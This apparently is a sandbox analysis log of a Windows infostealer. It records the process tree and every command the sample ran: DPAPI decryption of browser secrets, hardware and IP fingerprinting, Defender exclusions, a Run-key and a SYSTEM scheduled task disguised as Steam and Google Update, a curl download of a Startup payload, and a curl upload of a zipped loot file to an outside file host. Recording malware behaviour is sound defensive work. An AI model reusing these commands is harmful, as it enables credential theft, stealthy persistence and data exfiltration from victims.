PID 2956 wrote to memory of 116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 4644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 116 wrote to memory of 4644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4644 wrote to memory of 3140 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4644 wrote to memory of 3140 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 412 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3304 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3680 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3680 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 412 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 940 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 940 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3436 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3436 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 4456 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 456 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 456 wrote to memory of 2656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 456 wrote to memory of 2656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4004 wrote to memory of 2600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4004 wrote to memory of 2600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4940 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4940 wrote to memory of 4100 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3904 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3904 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1648 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1648 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 412 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 2996 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 412 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 4864 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4864 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4840 wrote to memory of 4104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4840 wrote to memory of 4104 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4840 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4840 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\new.exe

"C:\Users\Admin\AppData\Local\Temp\new.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4083.tmp" "c:\Users\Admin\AppData\Local\Temp\coslunty\CSC49F411F94BF644DD95F3BEBC997E183B.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,195,99,235,182,41,198,84,212,5,112,236,23,129,1,60,104,29,197,138,50,109,201,30,151,124,56,12,89,160,180,3,89,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,180,155,90,37,170,60,44,223,112,132,8,15,229,152,114,124,246,192,150,32,0,35,43,238,155,16,16,236,186,157,90,48,0,0,0,177,251,243,119,212,141,235,68,112,105,50,243,179,182,19,216,174,70,198,184,22,251,119,90,133,31,215,205,65,184,38,3,56,152,61,177,135,206,155,5,101,121,221,236,41,48,216,110,64,0,0,0,33,238,94,131,29,161,30,37,48,154,3,214,231,53,178,59,97,233,95,68,208,3,112,65,68,159,31,96,242,13,199,184,68,105,38,97,211,91,197,240,77,80,166,18,251,19,195,253,160,146,122,83,231,191,109,69,45,179,226,170,69,106,202,205), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,195,99,235,182,41,198,84,212,5,112,236,23,129,1,60,104,29,197,138,50,109,201,30,151,124,56,12,89,160,180,3,89,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,39,180,155,90,37,170,60,44,223,112,132,8,15,229,152,114,124,246,192,150,32,0,35,43,238,155,16,16,236,186,157,90,48,0,0,0,177,251,243,119,212,141,235,68,112,105,50,243,179,182,19,216,174,70,198,184,22,251,119,90,133,31,215,205,65,184,38,3,56,152,61,177,135,206,155,5,101,121,221,236,41,48,216,110,64,0,0,0,33,238,94,131,29,161,30,37,48,154,3,214,231,53,178,59,97,233,95,68,208,3,112,65,68,159,31,96,242,13,199,184,68,105,38,97,211,91,197,240,77,80,166,18,251,19,195,253,160,146,122,83,231,191,109,69,45,179,226,170,69,106,202,205), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,187,214,93,191,165,145,124,208,125,156,123,55,92,81,194,103,130,179,188,3,138,200,215,116,51,207,168,41,119,206,207,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,20,158,35,74,100,154,174,172,225,107,117,40,60,70,192,35,99,230,178,157,155,80,73,18,213,71,223,77,175,63,33,48,0,0,0,13,133,31,237,34,64,21,96,170,195,161,22,8,183,3,167,57,236,114,155,196,92,108,168,224,135,126,49,88,70,103,53,51,166,54,11,80,116,117,189,158,135,75,122,113,205,217,85,64,0,0,0,70,31,186,231,151,247,209,28,35,149,68,246,37,82,207,237,24,206,106,36,231,97,180,96,159,100,227,208,26,108,196,241,4,130,203,135,202,174,146,151,229,116,109,195,208,207,142,240,241,220,125,96,81,91,93,112,41,35,47,152,249,109,84,136), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,151,161,235,33,87,207,64,71,164,242,234,75,146,145,243,35,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,187,214,93,191,165,145,124,208,125,156,123,55,92,81,194,103,130,179,188,3,138,200,215,116,51,207,168,41,119,206,207,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,83,20,158,35,74,100,154,174,172,225,107,117,40,60,70,192,35,99,230,178,157,155,80,73,18,213,71,223,77,175,63,33,48,0,0,0,13,133,31,237,34,64,21,96,170,195,161,22,8,183,3,167,57,236,114,155,196,92,108,168,224,135,126,49,88,70,103,53,51,166,54,11,80,116,117,189,158,135,75,122,113,205,217,85,64,0,0,0,70,31,186,231,151,247,209,28,35,149,68,246,37,82,207,237,24,206,106,36,231,97,180,96,159,100,227,208,26,108,196,241,4,130,203,135,202,174,146,151,229,116,109,195,208,207,142,240,241,220,125,96,81,91,93,112,41,35,47,152,249,109,84,136), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4769.tmp" "c:\Users\Admin\AppData\Local\Temp\lssg30o3\CSC88193676E09C4075BE3495B5E738BB2C.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\new.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Tmuacblb.zip";"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Tmuacblb.zip";

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee031ab58,0x7ffee031ab68,0x7ffee031ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Program Files\Google\Chrome\Application\chrome.exe

